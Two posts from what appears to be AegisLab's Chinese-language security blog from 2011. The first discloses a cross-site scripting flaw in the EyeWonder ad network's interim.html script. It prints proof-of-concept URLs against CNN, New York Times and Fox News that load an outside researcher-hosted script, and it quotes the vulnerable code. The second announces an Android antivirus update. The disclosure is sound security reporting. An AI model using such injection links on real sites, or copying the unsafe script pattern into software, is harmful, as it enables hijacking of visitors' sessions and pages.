[ 安全通報 ] 24 十月, 2011 11:36

    部落客David Lynch(http://davidlynch.org/)發現許多網站使用eyewonder AD network,此項服務潛藏XSS漏洞, 其中不乏知名網站,如CNN新聞網, 紐約時報, Fox新聞網。

(圖一:CNN新聞網 )

 

(圖二:紐約時報 )

 

(圖三:Fox新聞網 )

 

(圖四:Hello, Lionic! )

 


測試連結如下:
http://edition.cnn.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js

http://www.nytimes.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js

http://www.foxnews.com/eyewonder/interim.html?src=http://davidlynch.org/projects/xss/eyewonder.js


這些網站都使用eyewonder這個AD network (http://www.eyewonder.com/ )
用的script如下,直接把query string的URL當成 javascript source 給inject到目前的網頁。

<script language="JavaScript">
    var query = window.location.search;
       var adUrl = query.substring(5, query.length);
       var clickthru;
       var failclickthru;
    document.write('<s'+'cript language="JavaScript" src="');
    document.write(adUrl+'"></s'+'cript>');
</script>


所以,這個漏洞可以inject 任何javascript到該網頁, 如指定CNN說 "Hi, Lionic!" (如圖四), 是更嚴重的攻擊。

參考資料: http://davidlynch.org/blog/2011/10/xss-is-fun/

 

By AegisLab 

[ 產品訊息 ] 03 十月, 2011 12:46

    我們很開心的宣布,由義集思實驗室開發的AegisLab Antivirus Free在Google官方市集已經發佈了主要更新版本了。在這個版本中除了增加 SD 卡掃描外,還新增了以下功能:

  • 排程掃描
  • 更精緻的使用者介面
  • 可註冊成為AegisLab會員
  • 效能改善
  • 錯誤修正
  •       而且現在掃描引擎可涵蓋超過1500個惡意樣本。馬上下載以及安裝 AegisLab Antivirus Free 來保護您的智慧型手機吧!!